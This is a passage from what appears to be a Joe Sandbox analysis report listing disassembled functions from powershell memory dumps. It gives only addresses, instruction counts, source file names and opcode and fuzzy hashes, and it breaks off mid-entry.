                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02ce71b469dabc6c432d4239a5ac3728ec38a24d3ac22bb125da3200815b8766
                                        • Instruction ID: 4785c592d91e99114a7e564fe8bea8d8e6ce4e850ba5242692db82f4f3aa63f3
                                        • Opcode Fuzzy Hash: 02ce71b469dabc6c432d4239a5ac3728ec38a24d3ac22bb125da3200815b8766
                                        • Instruction Fuzzy Hash: CD917DB4A002458FCB15CF59C5989AEFBB1FF48310B24859AD815AB365C735FC52CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04477740 Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 121a1d017b8483d181e1fdcb614712f8b77d6f270691d1cf3cf87ad53a245d0c
                                        • Instruction ID: 9e128fe6818976a24b6dc5fca3013b69c845f22307133b76cef3989c57a031f9
                                        • Opcode Fuzzy Hash: 121a1d017b8483d181e1fdcb614712f8b77d6f270691d1cf3cf87ad53a245d0c
                                        • Instruction Fuzzy Hash: DE51B0303002059FDB149B79D854AABB7EAFF88354F55446AE509DB351EB35FC06CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447BAD0 Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3ef5f852642bfb321bb368449ae50187149b7ea38ca0b718391307772ba3307
                                        • Instruction ID: 4930a8fdd1b5d74e59b42897863ed95b84f5da9e80ca446b9e08b4077488e8e3
                                        • Opcode Fuzzy Hash: a3ef5f852642bfb321bb368449ae50187149b7ea38ca0b718391307772ba3307
                                        • Instruction Fuzzy Hash: BC61D6B1E00248DFCB14DFA9D584ADDFBF5EF88314F14816AE819AB364DB34A946CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447BACB Relevance: .1, Instructions: 148COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1814a4e9bbe0a33da6ac000def544d405693638b1d19deeff74b33b206d23fd2
                                        • Instruction ID: 2b48523f97be493756f852b160d5952237017f55eb5b5f9985cc618696d7886a
                                        • Opcode Fuzzy Hash: 1814a4e9bbe0a33da6ac000def544d405693638b1d19deeff74b33b206d23fd2
                                        • Instruction Fuzzy Hash: 8751D5B1E00248DFCB54DFA9D584ADDFBF5EF88314F14806AE819AB364DB34A946CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E55B Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f666c29424832f703990280b443cc131c44221bd2999b84a0af3269915082ee3
                                        • Instruction ID: a8e8c699e528e2a1eaffa6dfca4866a8591f495d4c59196284ae6d9b24f5f757
                                        • Opcode Fuzzy Hash: f666c29424832f703990280b443cc131c44221bd2999b84a0af3269915082ee3
                                        • Instruction Fuzzy Hash: 9E4150B47002058FCF10DF6DD69496ABBE6EF8830475585A9F509DF365EB34EC068B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E560 Relevance: .1, Instructions: 130COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6bd057a5c4aede63af0a85b2f728294b5a61e6d5c205fa75d9fe4394c9dd4884
                                        • Instruction ID: 77824fbb737f41bc3613715e7d289d0edc255f902978efc16698fd4c1ca8b0ea
                                        • Opcode Fuzzy Hash: 6bd057a5c4aede63af0a85b2f728294b5a61e6d5c205fa75d9fe4394c9dd4884
                                        • Instruction Fuzzy Hash: D04150B47002058FCF10DFADD69496ABBE6EF88304B5585A9F509DF365EB34EC068B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 070E3CDD Relevance: .1, Instructions: 115COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d43bf15fc05d7050ecf84c551ef77e4bb6233634707cd46da51ae3cd6daf13c
                                        • Instruction ID: 72649fccc9188df5176bd5953caf7d527839b55077e9cda803f2ea89fbb1cb65
                                        • Opcode Fuzzy Hash: 0d43bf15fc05d7050ecf84c551ef77e4bb6233634707cd46da51ae3cd6daf13c
                                        • Instruction Fuzzy Hash: 1931C5F0A00202DFCB748A54C601A7AFFEAABC4748F1486A5E9119B395D735EC88C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 070E3CE6 Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1441ba9f05510dfaee343f3e0ede1c4b00d7a43fefb82ed95eacdf64851685c
                                        • Instruction ID: c8c9e40f89c1d7b4d0a74b28bed6922aa742d9389d31d7d5b7c9a8ae3395daf1
                                        • Opcode Fuzzy Hash: f1441ba9f05510dfaee343f3e0ede1c4b00d7a43fefb82ed95eacdf64851685c
                                        • Instruction Fuzzy Hash: E831B6F0A00202DFCB748A54C605A6AFFEBAFC4758F1486A5D9119B355D735EC44C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04472B00 Relevance: .1, Instructions: 109COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31657c150794efc7c163db53a059351b6c13d48157210ea883ca059f43352523
                                        • Instruction ID: aa03ee738b619ae50d14c665a105317fef0609ef5908768a21c955b047577de4
                                        • Opcode Fuzzy Hash: 31657c150794efc7c163db53a059351b6c13d48157210ea883ca059f43352523
                                        • Instruction Fuzzy Hash: 994148B4A005069FCB05CF59C5989EAFBB1FF48310B21859AD915AB364C776FC92CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04476FB1 Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 59591484891a85bd4071747cbc73d429b306a0ddabc4f0983815365ba6cc0231
                                        • Instruction ID: b050bb62b99679c55112e7ef3a5ab98d41d5c40585abbddec7530f1aa28f68dd
                                        • Opcode Fuzzy Hash: 59591484891a85bd4071747cbc73d429b306a0ddabc4f0983815365ba6cc0231
                                        • Instruction Fuzzy Hash: ED4150346052458FCB15CFA5C894AEABBF1EF8E310F15409AD445AB362DB35EC06CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E553 Relevance: .1, Instructions: 101COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69a2f7cad61bd3f395f74936bfd5f8b00307c1fc0534280dd7597f293272c11b
                                        • Instruction ID: 23853500c337bbd4f85ee5970c848c36f9ea76ddf069caac6898daa579dd2732
                                        • Opcode Fuzzy Hash: 69a2f7cad61bd3f395f74936bfd5f8b00307c1fc0534280dd7597f293272c11b
                                        • Instruction Fuzzy Hash: 643132B47402058FCF10DF6CD69496EBBE2EF88304B5585AAE505DF369EB38EC068B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447C398 Relevance: .1, Instructions: 101COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca645d53a8dacd234918e80a5747b47943b254ed3e46e6cd10c8907b7fd21070
                                        • Instruction ID: 9bb0c6901e79f07f18c7ba8cc90d3e98f4f5c81cb29e39f8e12f8ef30efc8f9c
                                        • Opcode Fuzzy Hash: ca645d53a8dacd234918e80a5747b47943b254ed3e46e6cd10c8907b7fd21070
                                        • Instruction Fuzzy Hash: 18319C313006019FDB15DB78E894B9AF7A6EFC4311F008639E60ACB365DF71A84ACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447AE7B Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d3befef53fe08455b3ed3b302f21ca5467ce2822500bb1499b407001d52b0990
                                        • Instruction ID: a8d19a8507d5bf0f5063aeef555cb1f74d6a8dad3edbe5b85a7aa64f694ba1b0
                                        • Opcode Fuzzy Hash: d3befef53fe08455b3ed3b302f21ca5467ce2822500bb1499b407001d52b0990
                                        • Instruction Fuzzy Hash: E3314D70A002099FDF18DF69D4957EEBBF6AF89310F14802AE405EB764EA349C428F91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447AD3B Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f8fa0cf499f01af90a51d468b70e5aa096cccb384f00619e55edfbfbe02b510
                                        • Instruction ID: 980a80f0b37ff7e1e2764fcfdf013ca0d71186fa0df84cd76c6dfd98980c56f2
                                        • Opcode Fuzzy Hash: 0f8fa0cf499f01af90a51d468b70e5aa096cccb384f00619e55edfbfbe02b510
                                        • Instruction Fuzzy Hash: 813195B4A002049FDB05EF74D455AFEB7F6EF84300F118469E554BB395DA389E058F91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447AE80 Relevance: .1, Instructions: 84COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2a15ad3b167a1abaade920be5388de73beafb818fe54063bb91139739c8f1c0
                                        • Instruction ID: e5d28059b5e57e00bb7bc0ce73e108c268bd61af2c2a26964425a6904378da0c
                                        • Opcode Fuzzy Hash: b2a15ad3b167a1abaade920be5388de73beafb818fe54063bb91139739c8f1c0
                                        • Instruction Fuzzy Hash: 60312C70A002099FDF18DFA9D5957EEBBF6AF89350F14802AE405EB364EB349C428B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E18B Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e6ccb051692e68e25eb4e1f313da53aa7ebc343c279530b11c97077f51bbf38
                                        • Instruction ID: 9b87a14886798f4c323ebc97068d65854f9fc408044d577ac3d130eabc3cbf68
                                        • Opcode Fuzzy Hash: 2e6ccb051692e68e25eb4e1f313da53aa7ebc343c279530b11c97077f51bbf38
                                        • Instruction Fuzzy Hash: F6313C75B002058FCB14DF69D458A9EBBF2AF88354F14456AE906EB3A0DF74AC49CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E190 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a75c0be6db4e71f5577e2cbc7924dba98ffe862d86ecc8c6bdf48546d4c0c3f4
                                        • Instruction ID: 5b87a23db19308d680c8ed15a689e7860b9c904ec5755aef80aaf2e0c9157801
                                        • Opcode Fuzzy Hash: a75c0be6db4e71f5577e2cbc7924dba98ffe862d86ecc8c6bdf48546d4c0c3f4
                                        • Instruction Fuzzy Hash: 19314B31B002048FCB14DF69D458A9EBBF2EF88310F14456AE906EB3A0DF74AC49CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447AD48 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ecd25d688bb041d971f69acf49ceae6167ba2334a5a4a1554416c95e7c5865bf
                                        • Instruction ID: 833a275f67f69674550fad8fac65eed86a54aca4bc7d44bf9d9a89ac47aeea05
                                        • Opcode Fuzzy Hash: ecd25d688bb041d971f69acf49ceae6167ba2334a5a4a1554416c95e7c5865bf
                                        • Instruction Fuzzy Hash: 403181B4E002099FDB04EFB4D455ABEB7F2EF84301F118869E614BB395DB389E058B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E5F3D8 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704454571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_e5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e51907bdaf5c24b0cb50ed5ef31822568cfc830965b7e90d9f349ef8715ef469
                                        • Instruction ID: e73fc2c4d1b15a8a54a6f94c4bb99238e9a28e97e543f4302b3ddef1f7400d65
                                        • Opcode Fuzzy Hash: e51907bdaf5c24b0cb50ed5ef31822568cfc830965b7e90d9f349ef8715ef469
                                        • Instruction Fuzzy Hash: CE21E271500200EFCF05DF14D9C0B27BB65FB88319F24C9B9ED095A256C33AD85ACBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447940B Relevance: .1, Instructions: 73COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e935824e0f469f491a93447314e64eff8a22ff74dd7c7295393e03b8d5544039
                                        • Instruction ID: e665794ee77b26d9c94057cbd443738daef76eaf33d3d62339ac6a8884b1cf59
                                        • Opcode Fuzzy Hash: e935824e0f469f491a93447314e64eff8a22ff74dd7c7295393e03b8d5544039
                                        • Instruction Fuzzy Hash: 7F319EB19057448EEB60CF6AD0893DAFFF6EB88324F28C02ED85D97315D77464828B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E5F02C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704454571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_e5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffd0d93570eab0da075c74de2451eb9f96134fc231de520e3e814f555308d20a
                                        • Instruction ID: 99767c5256fb5f9d8ba0cda676e73001a4c824a0e6cdcc63013c23df554a807d
                                        • Opcode Fuzzy Hash: ffd0d93570eab0da075c74de2451eb9f96134fc231de520e3e814f555308d20a
                                        • Instruction Fuzzy Hash: 10210475504240DFCB14DF24D9C4B26BFA5EB84329F28CA7DDD0A5B297C33AD84ACA61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04479410 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 46269bd77e28b02be36317348a86906285d9c5db7d88381392a4b0bf81da576f
                                        • Instruction ID: 4d8f224426d680167acbf5e2e76ad31373b840d1cdacfdafc8cd98f44524848a
                                        • Opcode Fuzzy Hash: 46269bd77e28b02be36317348a86906285d9c5db7d88381392a4b0bf81da576f
                                        • Instruction Fuzzy Hash: 1D219CB1A057448EEB60CF6AC0893CAFFF6EB88324F28C02ED85D97315D77464828B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E74B Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3ce529435d3158f78892c0332828396c8967f2a3ac4ca627ce6512bf02eda09
                                        • Instruction ID: 5cfbe3389786c7d897e17b3e6e2640ad3708230a5b98e830756638d62210a5fb
                                        • Opcode Fuzzy Hash: a3ce529435d3158f78892c0332828396c8967f2a3ac4ca627ce6512bf02eda09
                                        • Instruction Fuzzy Hash: 72213930A04645CFCB11DF79D994A9DBBF1FF48304F1486AAD40AAB3A1DB34A949CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447767C Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 336478b0a40f4c3a196bb923debc4654b937e95c319dbfa78767fefe45d0271c
                                        • Instruction ID: 619f8abedd3ee506241f6217533e2fcf8a982a3717ef38a4e8c9e5a802d7bd5c
                                        • Opcode Fuzzy Hash: 336478b0a40f4c3a196bb923debc4654b937e95c319dbfa78767fefe45d0271c
                                        • Instruction Fuzzy Hash: 99112B75700118CFCF04DBA8D9509EEB7F6EBCC361B0040A9E909EB725DA31ED458B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E5F3D3 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704454571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_e5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction ID: 202a6862e012ab104b4d5b0dfb4a9a2424164ad98705b155fb043b2e82350387
                                        • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction Fuzzy Hash: 9A219D76504240DFCF16CF10D9C4B16BF72FB98318F24C9A9DD494A656C33AD86ACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E5F027 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704454571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_e5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                        • Instruction ID: 12bfeb823aadc23e001e249489fcc576759d532abdf9d84d6f38aeb0787ea54c
                                        • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                        • Instruction Fuzzy Hash: 2D11DD75504280CFCB11CF14D5C4B15FFA1FB84328F28CAAADC094B696C33AD84ACB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E058 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad6f10462d4356334a53d423d54ebbbd7ff5803e7f250f346d1910b8056fe184
                                        • Instruction ID: 0d1c44926fdd4b50fcb0e1aaed25517d677bfe627621c629b4edad4560c369b5
                                        • Opcode Fuzzy Hash: ad6f10462d4356334a53d423d54ebbbd7ff5803e7f250f346d1910b8056fe184
                                        • Instruction Fuzzy Hash: 85015E36B00214DFCB119F74E808AAEBBF5FB88315F14416AE91AD7351DB36A912CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447EF10 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8ffee60b1e17bc105fea4a9236fde117093b3de1a60a590bf166184264e548a
                                        • Instruction ID: 231298e07b0e44b79576dfe2b784af1897dcc27b34b5171acb2d4c3abd6d93e2
                                        • Opcode Fuzzy Hash: a8ffee60b1e17bc105fea4a9236fde117093b3de1a60a590bf166184264e548a
                                        • Instruction Fuzzy Hash: AB11F734205750CFC728DF35D040996B7F6AF8971572089ADD48A87BA0CB32F845CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E5D005 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704454571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_e5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef69bd9117aa0e068b99b30b16044876b8d8fdc246d88fe158f1202524f42ef0
                                        • Instruction ID: a981eb1c34cb499e07f03a3a72ea372fe0d5571aad552b8206e981bd72d751c8
                                        • Opcode Fuzzy Hash: ef69bd9117aa0e068b99b30b16044876b8d8fdc246d88fe158f1202524f42ef0
                                        • Instruction Fuzzy Hash: AD012D6100E3C09ED7128B258C94B52BFB89F53229F1D85DBD8889F2E3C2695849C772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E5D01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704454571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_e5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0d6aa915fcedcc8af504255110ca07eed0fc8999ef5cf84d6578cba708ff568
                                        • Instruction ID: 1dd1522f3e819c47475810869ca8444ecebcdeae40030136718d6c7985608ec1
                                        • Opcode Fuzzy Hash: f0d6aa915fcedcc8af504255110ca07eed0fc8999ef5cf84d6578cba708ff568
                                        • Instruction Fuzzy Hash: AD01A77140D3409AE7204A25CD84B67BF99DF41335F18C929ED485A286C679984AD6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 044790E8 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6873358d98170056203d8381261e6ca55efd5aecbde09a96c6f4f40af175be52
                                        • Instruction ID: 822b6167e619680f520fc6042b36635c8c7fb1b60d7460a52785c3c114376887
                                        • Opcode Fuzzy Hash: 6873358d98170056203d8381261e6ca55efd5aecbde09a96c6f4f40af175be52
                                        • Instruction Fuzzy Hash: 50F028716046045BD3016B7594293EB7BA6DBC1338F14816BD8455B7C2CD3A1986C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447BF2E Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43bce8d37ce8a0d2dbfebecf996c576e742e018c75204a7ae53b587e33952302
                                        • Instruction ID: 22fffa198dd39aa78fc3999403df8f57b25d87a036ef6983e44b0e906ece0f51
                                        • Opcode Fuzzy Hash: 43bce8d37ce8a0d2dbfebecf996c576e742e018c75204a7ae53b587e33952302
